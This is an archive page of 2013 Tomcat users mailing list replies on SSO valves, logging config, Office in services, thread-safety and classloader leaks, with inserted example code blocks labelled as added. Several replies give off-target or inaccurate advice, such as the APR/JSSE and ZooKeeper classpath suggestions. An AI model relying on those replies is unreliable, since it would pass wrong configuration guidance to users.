HTH
Martin Gainty 

 
 Date: Wed, 24 Jul 2013 13:22:36 -0400
 Subject: OT: How to use JSP outside of tomcat
 From: aryeh.fried...@gmail.com
 To: users@tomcat.apache.org
 
 I have a number of documents that are very template like and ideal for
 JSP that are 1) not intended for the web and 2) need to be
 automatically batch processed (the output stored in output files).
 How do I call the JSP processor from the command line? (it takes
 tomcat too long to see updated files for the purpose I have in mind)
 
 
  

RE: SingleSignOn valve enabled by default?

2013-07-23 Thread Martin Gainty
NO:
 
<!-- /conf/server.xml -->
<!-- SingleSignOn valve, share authentication between web applications
Documentation at: /docs/config/valve.html -->

<!--
<Valve className="org.apache.catalina.authenticator.SingleSignOn" />
-->

YES:
 
<!-- /conf/server.xml -->
<!-- SingleSignOn valve, share authentication between web applications
Documentation at: /docs/config/valve.html -->
<Valve className="org.apache.catalina.authenticator.SingleSignOn" />

Martin 

 
Date: Fri, 19 Jul 2013 20:16:32 +0800
From: soul2zim...@gmail.com
To: users@tomcat.apache.org
Subject: SingleSignOn valve enabled by default?

 
 
 
Hi all,
 
I have an issue with SSO configuration in tomcat 7.0.42.
 
According to the doc [1],  it requires to enable SSO valve inside
server.xml. However, without making such modification, I deployed two
web-app test.war and test2.war (see attached file). Then, try to login
from /test, after successful login, I don't need to login a second time
for /test2 and can see the secured welcome page directly . That's
strange for me, is the SingleSignOn valve enabled by default in tomcat?
 
FYI, I add following configuration in tomcat-user.xml
<role rolename="User"/>
<user username="test" password="pass.1234" roles="User"/>
 
If it's not a real issue, please point me how that works, and I'd like
to know how could I set the reauthenticate parameter for SSO.
 
[1] http://tomcat.apache.org/tomcat-7.0-doc/config/host.html#Single_Sign_On
 
Thanks & Regards,
 
 
 

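The NO/YES distinction in the reply above can be checked mechanically. The following is an added example, not part of the original thread and not Tomcat's own code: it reports, for each Host in a server.xml, whether a live (uncommented) SingleSignOn Valve is present and whether its requireReauthentication attribute is set. The two server.xml fragments are constructed samples, and the function name sso_status and the host name intranet.example are assumptions.

```python
import xml.etree.ElementTree as ET

SSO_CLASS = "org.apache.catalina.authenticator.SingleSignOn"

# Constructed sample: the valve exists only inside an XML comment (the "NO" case).
SERVER_XML_COMMENTED = """
<Server port="8005" shutdown="SHUTDOWN">
  <Service name="Catalina">
    <Engine name="Catalina" defaultHost="localhost">
      <Host name="localhost" appBase="webapps">
        <!-- SingleSignOn valve, share authentication between web applications -->
        <!--
        <Valve className="org.apache.catalina.authenticator.SingleSignOn" />
        -->
      </Host>
    </Engine>
  </Service>
</Server>
"""

# Constructed sample: two hosts with a live valve (the "YES" case); only the
# second one forces each application to re-check credentials with its Realm.
SERVER_XML_ENABLED = """
<Server port="8005" shutdown="SHUTDOWN">
  <Service name="Catalina">
    <Engine name="Catalina" defaultHost="localhost">
      <Host name="localhost" appBase="webapps">
        <Valve className="org.apache.catalina.authenticator.SingleSignOn" />
      </Host>
      <Host name="intranet.example" appBase="webapps_new">
        <Valve className="org.apache.catalina.authenticator.SingleSignOn"
               requireReauthentication="true" />
      </Host>
    </Engine>
  </Service>
</Server>
"""


def sso_status(server_xml_text):
    """Return one dict per <Host> describing its SingleSignOn valve.

    ElementTree's default parser discards XML comments, so a valve that is
    only present inside <!-- ... --> is correctly reported as not enabled.
    """
    root = ET.fromstring(server_xml_text)
    report = []
    for host in root.iter("Host"):
        # Only direct children of the Host count: that is where the valve
        # is configured in the fragments quoted in this thread.
        valves = [v for v in host.findall("Valve")
                  if v.get("className") == SSO_CLASS]
        if valves:
            raw = valves[0].get("requireReauthentication", "false")
            reauth = raw.strip().lower() == "true"
        else:
            reauth = None  # attribute is meaningless without the valve
        report.append({
            "host": host.get("name"),
            "sso_enabled": bool(valves),
            "require_reauthentication": reauth,
        })
    return report


if __name__ == "__main__":
    for label, text in (("commented", SERVER_XML_COMMENTED),
                        ("enabled", SERVER_XML_ENABLED)):
        for row in sso_status(text):
            print(label, row)
```
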
  

RE: ClassNotFoundException org.apache.juli.FileHandler in Tomcat 7.0.42 / OpenJDK 6 b27 (FreeBSD)

2013-07-13 Thread Martin Gainty
Matthias

MG> this is what $CATALINA_HOME/conf/logging.properties is SUPPOSED to look like

# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements.  See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License.  You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
handlers = 1catalina.org.apache.juli.FileHandler, 2localhost.org.apache.juli.FileHandler, 3manager.org.apache.juli.FileHandler, 4host-manager.org.apache.juli.FileHandler, java.util.logging.ConsoleHandler
.handlers = 1catalina.org.apache.juli.FileHandler, java.util.logging.ConsoleHandler

# Handler specific properties.
# Describes specific configuration info for Handlers.

1catalina.org.apache.juli.FileHandler.level = FINE
1catalina.org.apache.juli.FileHandler.directory = ${catalina.base}/logs
1catalina.org.apache.juli.FileHandler.prefix = catalina.
2localhost.org.apache.juli.FileHandler.level = FINE
2localhost.org.apache.juli.FileHandler.directory = ${catalina.base}/logs
2localhost.org.apache.juli.FileHandler.prefix = localhost.
3manager.org.apache.juli.FileHandler.level = FINE
3manager.org.apache.juli.FileHandler.directory = ${catalina.base}/logs
3manager.org.apache.juli.FileHandler.prefix = manager.
4host-manager.org.apache.juli.FileHandler.level = FINE
4host-manager.org.apache.juli.FileHandler.directory = ${catalina.base}/logs
4host-manager.org.apache.juli.FileHandler.prefix = host-manager.
java.util.logging.ConsoleHandler.level = FINE
java.util.logging.ConsoleHandler.formatter = java.util.logging.SimpleFormatter


# Facility specific properties.
# Provides extra control for each logger.

org.apache.catalina.core.ContainerBase.[Catalina].[localhost].level = INFO
org.apache.catalina.core.ContainerBase.[Catalina].[localhost].handlers = 2localhost.org.apache.juli.FileHandler
org.apache.catalina.core.ContainerBase.[Catalina].[localhost].[/manager].level = INFO
org.apache.catalina.core.ContainerBase.[Catalina].[localhost].[/manager].handlers = 3manager.org.apache.juli.FileHandler
org.apache.catalina.core.ContainerBase.[Catalina].[localhost].[/host-manager].level = INFO
org.apache.catalina.core.ContainerBase.[Catalina].[localhost].[/host-manager].handlers = 4host-manager.org.apache.juli.FileHandler
# For example, set the org.apache.catalina.util.LifecycleBase logger to log
# each component that extends LifecycleBase changing state:
#org.apache.catalina.util.LifecycleBase.level = FINE


 
 Date: Sat, 13 Jul 2013 20:04:15 +0200
 From: matth...@petermann-it.de
 To: users@tomcat.apache.org
 Subject: Re: ClassNotFoundException org.apache.juli.FileHandler in Tomcat 
 7.0.42 / OpenJDK 6 b27 (FreeBSD)
 
 On 13.07.2013 16:07, Konstantin Kolinko wrote:
  2013/7/13 Konstantin Kolinko knst.koli...@gmail.com:
  2013/7/13 Matthias Petermann matth...@petermann-it.de:
  Hello,
 
  when I try to start Tomcat 7.0.42 with OpenJDK 6 b27, it complains about not
  finding classes for the logging handlers. I created a minimal
  logging.properties to narrow down the problem:
 
   handlers = 1catalina.org.apache.juli.FileHandler, java.util.logging.ConsoleHandler
   .handlers = java.util.logging.ConsoleHandler
 
   1catalina.org.apache.juli.FileHandler.level = FINE
   1catalina.org.apache.juli.FileHandler.directory = ${catalina.base}/logs
   1catalina.org.apache.juli.FileHandler.prefix = catalinatest.
 
   java.util.logging.ConsoleHandler.level = FINE
   java.util.logging.ConsoleHandler.formatter = java.util.logging.SimpleFormatter
 
   org.apache.catalina.core.ContainerBase.[Catalina].[localhost].level = INFO
   org.apache.catalina.core.ContainerBase.[Catalina].[localhost].handlers = 1catalina.org.apache.juli.FileHandler
 
  The output of ./catalina.sh run is the following:
 
   INFO: Starting Servlet Engine: Apache Tomcat/7.0.42
   Can't load log handler 1catalina.org.apache.juli.FileHandler
   java.lang.ClassNotFoundException: 1catalina.org.apache.juli.FileHandler
   java.lang.ClassNotFoundException: 1catalina.org.apache.juli.FileHandler
   at java.net.URLClassLoader$1.run(URLClassLoader.java:217)
   at java.security.AccessController.doPrivileged(Native Method)

RE: Memory limits for children processes when running Tomcat as service?

2013-06-27 Thread Martin Gainty
When you run your MS app standalone how much heap, stack does this process 
occupy?
When TC starts up how much heap, stack is left over for the standalone Microsoft 
app?

If you're not going to power up your machine with 8GB RAM and at least tera of 
storage your only solution
is to configure your Microsoft Compound Documents be opened, read and written 
using POI
https://poi.apache.org/

Keep us apprised,
Martin
 
 From: j.tosov...@email.cz
 To: users@tomcat.apache.org
 Subject: RE: Memory limits for children processes when running Tomcat as 
 service?
 Date: Thu, 27 Jun 2013 21:24:03 +0200
 
 On 2013-06-27 André Warnier wrote:
  honyk wrote:
   On 2013-06-26 André Warnier wrote:
   honyk wrote:
   Dear All,
  
   I have a JSF2.0 app that executes (via ProcessBuilder) an external
   script.
   This script opens PPTX via PowerPoint ActiveX object, manipulate it
   and
   save. It runs on Windows Server 2008 R2 64-bit, 4GB RAM, JDK 7.
  
   When tomcat 7 is launched using startup.bat (with original
  settings),
   it
   works fine.
  
   When tomcat runs as a service, opening the PPTX in the PowerPoint
   fails
   because of Out Of Memory error regardless Xmx settings
   (tomcat7w.exe).
   I originally asked PowerPoint forum, but haven't got any explanation yet:
   http://answers.microsoft.com/thread/37cbebf6-4003-4ab0-9295-92413aaecc2e
   But as the entry point is Tomcat and the only difference between
   problematic
   and non problematic behavior is the 'service' mode, maybe there is
   something
   related in the tomcat7.exe code base. Just guessing.
  
   Has anybody an idea why both modes behave differently?
  
   Hi.
   The problem has nothing to do with Tomcat per se.
   It is due to running a Microsoft Office program (or library modules
   such as the Interop
   series) as a sub-process of a Windows Service (and thus in the same
   Service context) which
   is something that is not in the design of Microsoft Office, not
   supported by Microsoft,
   and even actively discouraged by Microsoft.
   See : http://support.microsoft.com/kb/257757
  
   The problem is basically that a Windows Service does not run in the
   same environment as
   a user session environment, and as they say in that article, you
  will
   certainly
   experience unstable behavior and/or deadlock somewhere, and will
  get
   no help for it.
  
   I read this article but because I do not need interaction and my code doesn't
   run simultaneously and tomcat is launched using my credentials - I still
   thought it could be possible.
  
   Now realizing that tomcat launched using my credentials do not necessarily
   mean that Office use the same...
  
   Personal experience : some things will work with one MS-Office
  program,
   and totally fail
   with another; even simple things like opening or saving a file.  It
  may
   work with one
   file, and fail with another, for no apparent reason.
   You get an OOM error in this case, but other cases may be file not
   found (although it's
   there) or whatever other bizarre failures.
   Ultimately it is unpredictable, frustrating and time-consuming.
  
   I was an optimist when everything worked in the user mode...
  
   Solutions :
   1) instead of MS-Office, use LibreOffice or OpenOffice.  Both can
  run
   in headless mode,
   and provide an API to have them do things with documents. And both
   can open and
   manipulate MS-Office documents.  Depending on what you do, there may
  be
   some differences
   in the results, but it works fine for many things.
   Or try one of the other solutions suggested in the above article.
   (I have not tried them, I use OpenOffice/LibreOffice).
  
   I'll give it a try. I originally tested Apache POI, but required
   functionality is not implemented yet.
  
   2) do not run Tomcat as a Service. Create a virtual Windows machine,
   and run it in a user
   console (with startup.bat). You can restrict access to the VM, and
   since it is a VM, it
   can run unattended, just as a service would.
   (I am also using this scheme, when circumstances permit).
   But in that case, also pay attention to the licensing considerations
  at
   the end of the
   article.
  
   I am quite lost in this ;-) But I'll investigate further.
  
   Thanks a lot for your exhaustive analysis! Finally it looks my way is
  no way
   :-)
  
  
  No problem. I went myself through the exact same issues as you
  described, I did believe
  that there must be a workaround, tried a number of things with great
  loss of time, and
  finally had to admit that the MS article was right and that there is no
  good solution with
  MS-Office when starting it from a Service.
 
 I appreciate a lot your response and sharing your experience. Without it I
 would spend many additional hours of investigating, trial and error
 attempts, asking the same topic in different places, all this in heavy
 frustration... 
 
  About the Virtual Machine solution : usually, when you want something

RE: forward request by changing the port in request url

2013-06-13 Thread Martin Gainty
for IP Redirecting and or automatic Network Address Translations (e.g. Port 80 
redirects to Port 81)

you will need a proxy server 

please contact supp...@cisco.com


for product and service options

 

Good luck
Martin 



  


 From: anigo...@cisco.com
 To: users@tomcat.apache.org
 Subject: forward request by changing the port in request url
 Date: Thu, 13 Jun 2013 18:00:12 +
 
 i have two service running under tomcat. One service is default i.e. catalina 
 on port 8080 and 8443
 second service is catalina_new on port 8081 and 8444.
 
 i have application abc.war deployed in webapps_new service which is running 
 on port 8081. This application is not there in webapps.
 i want if any request coming on port 8080 for application abc, it is 
 forwarded to port 8081.(same for ssl port 8443-8444)
 Is there any way to do the same.
 
 Thanks
 Anil
  

RE: Class cast exception when starting tomcat 7.0.1

2013-06-13 Thread Martin Gainty
you can swap out one jar for another

Ant has no idea which container it is communicating with unless you tell it

catalina.jar is tied to the Servlet Spec so 
you cannot change catalina unless you change the accompanying Servlet Spec

so you've already done that why not write a Quick and Dirty ant taskdef

I'll pick this up on us...@ant.apache.org

 

Good luck

Martin Gainty 

  


 From: jm...@rocketsoftware.com
 To: users@tomcat.apache.org
 Subject: RE: Class cast exception when starting tomcat 7.0.1
 Date: Thu, 13 Jun 2013 20:19:07 +
 
 I had catalina.jar in WEB-INF/lib. It's needed because we have an 
 implementation of Realm to store an encrypted tomcat password users enter in 
 the webapp. If I remove it and add the catalina.jar from tomcat_home/lib to 
 the classpath, I have to change the signature from 
 org.apache.catalina.realm.RealmBase.Digest(String, String) to 
 org.apache.catalina.realm.RealmBase.Digest(String, String, String). Then the 
 code compiles ok, but I get this error when building with ant to make a war 
 file:
 
 error: method Digest in class RealmBase cannot be applied to given types;
 [javac] encryptedOldPwd = RealmBase.Digest(oldTomcatPassword, digestAlg,null);
 
 Should I not be writing code that needs classes from catalina.jar?
 
 Thanks,
 
 Jane
 
 -Original Message-
 From: Christopher Schultz [mailto:ch...@christopherschultz.net] 
 Sent: Thursday, June 13, 2013 11:09 AM
 To: Tomcat Users List
 Subject: Re: Class cast exception when starting tomcat 7.0.1
 
 
 Jane,
 
 On 6/13/13 12:38 PM, Jane Muse wrote:
  In the archives I thought the only unreleased versions would be 
  specified beta. Please let me know if this is not the case.
 
 I'll admit it's not clear from the version number which versions are beta, 
 released, etc. You have to look at the ChangeLog:
 
 http://tomcat.apache.org/tomcat-7.0-doc/changelog.html
 
 Each release contains a release date and (optionally) a comment on the 
 quality of the build. The first non-beta version of Tomcat 7.0.x was 7.0.6. 
 Tomcat 7.0.1 (distinct from 7.0.10) was actually not released
 probably because it was broken for some reason.
 
 When the Tomcat team rolls a release, there is a vote. If there aren't enough 
 yes votes (or any no votes), the release is abandoned but the number 
 isn't re-used.
 
 Anyhow, there's no reason to attempt to migrate from Tomcat 6.0.x to Tomcat 
 7.0.x by shooting for an early version of Tomcat 7.0.x: you should go for 
 the latest.
 
 Also, if you mistype and say Tomcat 7.0.1 instead of Tomcat 7.0.10
 or Tomcat 7.0.4 instead of Tomcat 7.0.40 (or Tomcat 7.0.41), don't get 
 an offended when people tell you you are doing it wrong.
 Just say whoops, I meant 7.0.40 and move on.
 
 Back to your original problem... have you modified the Tomcat 7 installation 
 in any way -- other than dropping your WAR file/exploded WAR into the 
 webapps/ directory)?
 
 Also, do you have any Tomcat-related JAR files in your webapp's WEB-INF/lib 
 directory?
 
 -chris

RE: Customizing SSL in HttpClient

2013-06-11 Thread Martin Gainty
Anil
 
if you want JSSE Handshaking to be enabled on server enable AprLifecycle 
Listener on server.xml e.g.
  <Listener className="org.apache.catalina.core.AprLifecycleListener" SSLEngine="on" />

Any WebServer (including Tomcat) has no knowledge of external HTML Servers 
around it you should use netstat
netstat -ab | grep 443

Tell us what you see
Martin 

 
 From: anigo...@cisco.com
 To: users@tomcat.apache.org
 Subject: RE: Customizing SSL in HttpClient
 Date: Tue, 11 Jun 2013 06:29:05 +
 
 
 
 -Original Message-
 From: Anil Goyal -X (anigoyal - Aricent Technologies at Cisco) 
 Sent: Tuesday, June 11, 2013 11:23 AM
 To: Tomcat Users List
 Subject: RE: Customizing SSL in HttpClient
 
 
 
 -Original Message-
 From: Christopher Schultz [mailto:ch...@christopherschultz.net]
 Sent: Monday, June 10, 2013 7:51 PM
 To: Tomcat Users List
 Subject: Re: Customizing SSL in HttpClient
 
 
 Anil,
 
 On 6/10/13 8:42 AM, Anil Goyal -X (anigoyal - Aricent Technologies at
 Cisco) wrote:
  I am trying to create a http client and send a request to certain port 
  of a server using below code:
  
  HttpClient client = new HttpClient(); 
  client.getHostConfiguration().setHost(address, portNumber, protocol);
  
  Here portNumber that I am setting is 8444(https port of tomcat)
  
  When I execute client.executemethod() and at the server side when I 
  tried to retrieve request.getRequestURL(), I am getting the url with 
  port 443 not 8444 which I set in client. Even request.getServerPort is 
  giving 443 not 8444.
 
 Is there any kind of port-forwarding or anything else going on?
 
  The things are working fine for 8081(http port of tomcat) i.e. 
  HttpClient client = new HttpClient(); 
  client.getHostConfiguration().setHost(address, portNumber, protocol);
  
  Here portNumber that I am setting is 8081(https port of tomcat)
  
  When I execute client.executemethod() and at the server side when I 
  tried to retrieve request.getRequestURL(), I am getting the url with 
  port 8081 which I set in client. Even request.getServerPort is giving 
  8081.
 
 Can you show us a bit more of the code? It's not clear from your client code 
 that the port number is set correctly, and you only mentioned the server. Can 
 you give us some of that, too? Also, what do your Connector elements look 
 like in server.xml?
 
 - -chris
 
 -
 To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org
 For additional commands, e-mail: users-h...@tomcat.apache.org
 
 
 Please consider the code flow as below:
 
 HttpClient client = new HttpClient();
 // DEFAULT_HTTPS_PORT=8444 and DEFAULT_HTTP_PORT=8081 are defined in LocalNetworkConstants.java
 portNumber = secure ? LocalNetworkConstants.DEFAULT_HTTPS_PORT : LocalNetworkConstants.DEFAULT_HTTP_PORT;
 LOG.debug("the value of https port is" + String.valueOf(portNumber));
 if (secure) {
 Protocol 

RE: Illegal access: this web application instance has been stopped already and NoClassDefFoundError

2013-06-11 Thread Martin Gainty
I

   org.apache.zookeeper.ClientCnxn$SendThread.run(ClientCnxn.java:1115)
  
   
  Caused by: java.lang.ClassNotFoundException:
  org.apache.zookeeper.server.ZooTrace
MG> put zookeeper*.jar on CLASSPATH

   at
   org.apache.catalina.loader.WebappClassLoader.loadClass(WebappClassLoader.java:1711)
  
   
  at
  org.apache.catalina.loader.WebappClassLoader.loadClass(WebappClassLoader.java:1556)
   ... 1 more
   
   
   
   
   at the same time,the following is also in catalina.out:
   
   
   
   INFO: Illegal access: this web application instance has been
   stopped already. Could not load
   org.apache.zookeeper.server.ZooTrace. The eventual following stack
   trace is caused by an error thrown for debugging purposes as well
   as to attempt to terminate the thread which caused the illegal
   access, and has no functional impact. 
   java.lang.IllegalStateException at
   org.apache.catalina.loader.WebappClassLoader.loadClass(WebappClassLoader.java:1597)
  
   
  at
  org.apache.catalina.loader.WebappClassLoader.loadClass(WebappClassLoader.java:1556)
   at
   org.apache.zookeeper.ClientCnxn$SendThread.run(ClientCnxn.java:1115)
  
   
   
   
   I searched Google and the mailing list and couldn't find any solution, please
   help me.
   
   
   Environment info:
   
   JDK:1.6.0_45
   
   Tomcat:7.0.40
   
   Zookeeper:3.4.5
  
  Can you give us any more of the stack trace? It looks like this is
  happening during shutdown, but all the ServletContextListeners should
  complete before the WebappClassLoader starts shedding its loaded classes.
  
  Are you explicitly shutting-down the ClientCnxn thread in a SCL's
  destroy() method? If not, you need to do that.
  
 
 Sorry, I can't get any more of the stack trace.
  
 We wrapped the zookeeper client as a spring bean and invoked the close method of 
 zookeeper in the destroy-method of the bean; in that close method, the zookeeper 
 Send Thread was closed.
 When tomcat was shut down, Spring closed its container and the bean was 
 destroyed, then the destroy-method of the bean was invoked.
 I am confused about why the Send Thread of Zookeeper seemed to exit slower than 
 the WebappClassLoader shedding its loaded classes. 
  
 ps: details of zookeeper closing
 org.apache.zookeeper.Zookeeper
     public synchronized void close() throws InterruptedException {
         if (!cnxn.getState().isAlive()) {
             if (LOG.isDebugEnabled()) {
                 LOG.debug("Close called on already closed client");
             }
             return;
         }
         if (LOG.isDebugEnabled()) {
             LOG.debug("Closing session: 0x" + Long.toHexString(getSessionId()));
         }
         try {
             cnxn.close();
         } catch (IOException e) {
             if (LOG.isDebugEnabled()) {
                 LOG.debug("Ignoring unexpected exception during close", e);
             }
         }
         LOG.info("Session: 0x" + Long.toHexString(getSessionId()) + " closed");
     }
 --
 org.apache.zookeeper.ClientCnxn
     public void close() throws IOException {
         if (LOG.isDebugEnabled()) {
             LOG.debug("Closing client for session: 0x"
                       + Long.toHexString(getSessionId()));
         }
         try {
             RequestHeader h = new RequestHeader();
             h.setType(ZooDefs.OpCode.closeSession);
             submitRequest(h, null, null, null);
         } catch (InterruptedException e) {
             // ignore, close the send/event threads
         } finally {
             disconnect();
         }
     }

     public void disconnect() {
         if (LOG.isDebugEnabled()) {
             LOG.debug("Disconnecting client for session: 0x"
                       + Long.toHexString(getSessionId()));
         }
         sendThread.close();
         eventThread.queueEventOfDeath();
     }
 -
 org.apache.zookeeper.ClientCnxn.SendThread
     void close() {
         state = States.CLOSED;
         clientCnxnSocket.wakeupCnxn();
     }

     @Override
     public void run() {
         clientCnxnSocket.introduce(this, sessionId);
         clientCnxnSocket.updateNow();
         clientCnxnSocket.updateLastSendAndHeard();
         int to;
         long lastPingRwServer = System.currentTimeMillis();
         while (state.isAlive()) {
             try {
                 if (!clientCnxnSocket.isConnected()) {
                     if (!isFirstConnect) {
                         try {
                             Thread.sleep(r.nextInt(1000));
                         } catch (InterruptedException e) {
                             LOG.warn("Unexpected exception", e);
                         }
                     }
                     // don't re-establish connection if we are closing
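
Added example, not part of the original thread and not ZooKeeper or Tomcat code: in the quoted source, close() only sets the state to CLOSED and wakes the send thread, and nothing in the visible lines waits for that thread to finish. The stand-alone Java simulation below (Java 8 or later) shows how that ordering lets a worker thread outlive the "class loader stopped" moment, and how a bounded join in the destroy callback closes the gap. SignalOnlyClient, stopWebapp and the timings are assumptions made for the demo; how to reach the real client's threads is not shown on the page.

```java
import java.util.concurrent.atomic.AtomicBoolean;

public class ShutdownOrderDemo {

    /** Stand-in for a client whose close() only signals its I/O thread. */
    static final class SignalOnlyClient {
        private volatile boolean alive = true;
        private final AtomicBoolean loaderStopped;
        final AtomicBoolean touchedStoppedLoader = new AtomicBoolean(false);
        final Thread sendThread;

        SignalOnlyClient(AtomicBoolean loaderStopped) {
            this.loaderStopped = loaderStopped;
            this.sendThread = new Thread(this::run, "demo-SendThread");
            this.sendThread.setDaemon(true);
            this.sendThread.start();
        }

        private void run() {
            while (alive) {
                pause(20);              // normal I/O loop
            }
            pause(150);                 // exit path that still needs to load classes
            if (loaderStopped.get()) {  // in Tomcat: the "Illegal access" log entry
                touchedStoppedLoader.set(true);
            }
        }

        /** Returns immediately; the thread winds down on its own schedule. */
        void close() {
            alive = false;
        }
    }

    static void pause(long millis) {
        try {
            Thread.sleep(millis);
        } catch (InterruptedException e) {
            Thread.currentThread().interrupt();
        }
    }

    /**
     * Simulates a webapp stop: the destroy callback runs, then the container
     * stops the class loader. Returns true if the worker thread was still
     * running its exit path after the loader had been stopped.
     */
    static boolean stopWebapp(boolean joinBeforeReturning) throws InterruptedException {
        AtomicBoolean loaderStopped = new AtomicBoolean(false);
        SignalOnlyClient client = new SignalOnlyClient(loaderStopped);
        pause(50);

        // destroy-method / contextDestroyed()
        client.close();
        if (joinBeforeReturning) {
            client.sendThread.join(5000);   // bounded, so shutdown cannot hang forever
        }

        // container stops the web application class loader
        loaderStopped.set(true);

        client.sendThread.join();
        return client.touchedStoppedLoader.get();
    }

    public static void main(String[] args) throws InterruptedException {
        System.out.println("close() only:        illegal access = " + stopWebapp(false));
        System.out.println("close() then join(): illegal access = " + stopWebapp(true));
    }
}
```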

RE: WebSockets Thread Safety question

2013-06-03 Thread Martin Gainty
/java/util>javap Collections | grep synchronized
public static java.util.Collection synchronizedCollection(java.util.Collection);
static java.util.Collection synchronizedCollection(java.util.Collection, java.lang.Object);
public static java.util.Set synchronizedSet(java.util.Set);
static java.util.Set synchronizedSet(java.util.Set, java.lang.Object);
public static java.util.SortedSet synchronizedSortedSet(java.util.SortedSet);
public static java.util.List synchronizedList(java.util.List);
static java.util.List synchronizedList(java.util.List, java.lang.Object);
public static java.util.Map synchronizedMap(java.util.Map);
public static java.util.SortedMap synchronizedSortedMap(java.util.SortedMap);

use java.util.Collections.synchronizedList 

Martin 


 From: ch...@derham.me.uk
 Date: Mon, 3 Jun 2013 07:42:01 -0300
 Subject: Re: WebSockets Thread Safety question
 To: users@tomcat.apache.org
 
  When I use the syntax from the samples in the onTextMessage() method, I get
  ConcurrentModificationException if I have more than one client sending data
  to the server at the same time:
 
  for(MyMessageInbound mmib: mmiList){
  CharBuffer buffer = CharBuffer.wrap(cb);
  mmib.myoutbound.writeTextMessage(buffer);
  mmib.myoutbound.flush();
  }
 
 
  Changing it to the following works fine:
 
  for(int i = 0; i < mmiList.size(); i++) {
  MyMessageInbound mmib = mmiList.get(i);
  CharBuffer buffer = CharBuffer.wrap(cb);
  mmib.myoutbound.writeTextMessage(buffer);
  mmib.myoutbound.flush();
  }
 
  However, this approach is not as efficient as to use an Iterator, unless I
  clone the mmiList Collection to iterate over it...
 
 Can you explain where the inefficiency is?
 
 Thanks
 
 Chris
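
Added example, not part of the original thread: a stand-alone Java program (Java 8 or later) that reproduces the broadcast loop discussed above with a second thread registering a client mid-iteration. It compares a plain ArrayList, Collections.synchronizedList with and without the synchronized block its Javadoc requires around iteration, and CopyOnWriteArrayList, which iterates over a snapshot. BroadcastDemo, the String stand-in for MyMessageInbound and the latch-based timing are assumptions.

```java
import java.util.ArrayList;
import java.util.Arrays;
import java.util.Collections;
import java.util.ConcurrentModificationException;
import java.util.List;
import java.util.concurrent.CopyOnWriteArrayList;
import java.util.concurrent.CountDownLatch;
import java.util.concurrent.TimeUnit;

public class BroadcastDemo {

    /**
     * Iterates over the client list the way onTextMessage() does while a
     * second thread registers a new client, as onOpen() would.
     * holdLock=true wraps the loop in synchronized (clients).
     */
    static String broadcast(List<String> clients, boolean holdLock) throws InterruptedException {
        final CountDownLatch inLoop = new CountDownLatch(1);
        final CountDownLatch joined = new CountDownLatch(1);
        Thread joiner = new Thread(() -> {
            try {
                inLoop.await();
                clients.add("late-client");   // structural modification from another thread
            } catch (InterruptedException e) {
                Thread.currentThread().interrupt();
            } finally {
                joined.countDown();
            }
        });
        joiner.start();

        String result;
        try {
            if (holdLock) {
                synchronized (clients) {       // the joiner's add() blocks until the loop ends
                    result = loop(clients, inLoop, joined);
                }
            } else {
                result = loop(clients, inLoop, joined);
            }
        } finally {
            inLoop.countDown();                // never leave the joiner waiting
            joiner.join();
        }
        return result + ", size afterwards=" + clients.size();
    }

    private static String loop(List<String> clients, CountDownLatch inLoop, CountDownLatch joined)
            throws InterruptedException {
        int delivered = 0;
        try {
            for (String client : clients) {
                delivered++;                   // stands in for writeTextMessage() + flush()
                inLoop.countDown();            // release the joiner while we are mid-iteration
                joined.await(200, TimeUnit.MILLISECONDS);
            }
            return "delivered=" + delivered;
        } catch (ConcurrentModificationException e) {
            return "ConcurrentModificationException after " + delivered + " client(s)";
        }
    }

    /** Constructed sample data: two already-connected clients. */
    static List<String> seed() {
        return new ArrayList<>(Arrays.asList("client-1", "client-2"));
    }

    public static void main(String[] args) throws InterruptedException {
        System.out.println("ArrayList:                 "
                + broadcast(seed(), false));
        System.out.println("synchronizedList, no lock: "
                + broadcast(Collections.synchronizedList(seed()), false));
        System.out.println("synchronizedList + lock:   "
                + broadcast(Collections.synchronizedList(seed()), true));
        System.out.println("CopyOnWriteArrayList:      "
                + broadcast(new CopyOnWriteArrayList<>(seed()), false));
    }
}
```

The locked variant completes, but only by making every connecting client wait for the whole broadcast, including its network writes; the copy-on-write list avoids both the exception and that stall at the cost of copying the array on each add or remove.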
 
 
  

RE: checkThreadLocalMapForLeaks: com.sun.xml.bind.v2.runtime.Coordinator

2013-05-19 Thread Martin Gainty
Hi Jesse

You can configure your customised JAXB factory implementor by implementing a 
jaxb.properties file
with a javax.xml.bind.context.factory=value entry:

javax.xml.bind.context.factory=org.eclipse.persistence.jaxb.JAXBContextFactory

Be aware that in key=value, the value is the name of the class that implements 
createContext for JAXB
http://docs.oracle.com/javaee/5/api/javax/xml/bind/JAXBContext.html

Martin 

 
 Date: Sun, 19 May 2013 12:39:12 -0400
 Subject: checkThreadLocalMapForLeaks: com.sun.xml.bind.v2.runtime.Coordinator
 From: jie...@gmail.com
 To: users@tomcat.apache.org
 
 Greetings,
 
 I am using Apache Tomcat 7.0.40, via IBM Java 7 SR2. I am seeing the
 following on Tomcat shutdown:
 
 org.apache.catalina.loader.WebappClassLoader.checkThreadLocalMapForLeaks
 The web application [] created a ThreadLocal with key of type
 [com.sun.xml.bind.v2.runtime.Coordinator$1] (value
 [com.sun.xml.bind.v2.runtime.Coordinator$1@f9b00906]) and a value of
 type [java.lang.Object[]] (value [[Ljava.lang.Object;@3d8d9b93]) but
 failed to remove it when the web application was stopped. Threads are
 going to be renewed over time to try and avoid a probable memory leak.
 
 When I inspect the libraries within the application I find:
 
 $ grep com.sun.xml.bind.v2.runtime.Coordinator *
 Binary file jaxb-impl-2.2.1.1.jar matches
 
 Apache Maven dependency:tree shows that this is coming from Apache
 Wink (wink-common - wink-client).
 
 Is this JAXB ThreadLocal something that Apache Tomcat ought to protect me 
 from?
 
 Thank you,
 -Jesse
 
 
  

RE: getting the request that created the session

2013-04-27 Thread Martin Gainty
org.apache.catalina.valves.RemoteIpValve getRemoteIpHeader?
Martin

  Date: Sat, 27 Apr 2013 23:08:31 +0200
 Subject: getting the request that created the session
 From: rosenberg.l...@gmail.com
 To: users@tomcat.apache.org
 
 Hi,
 
 is there any possibility to get the first request from a session (or any
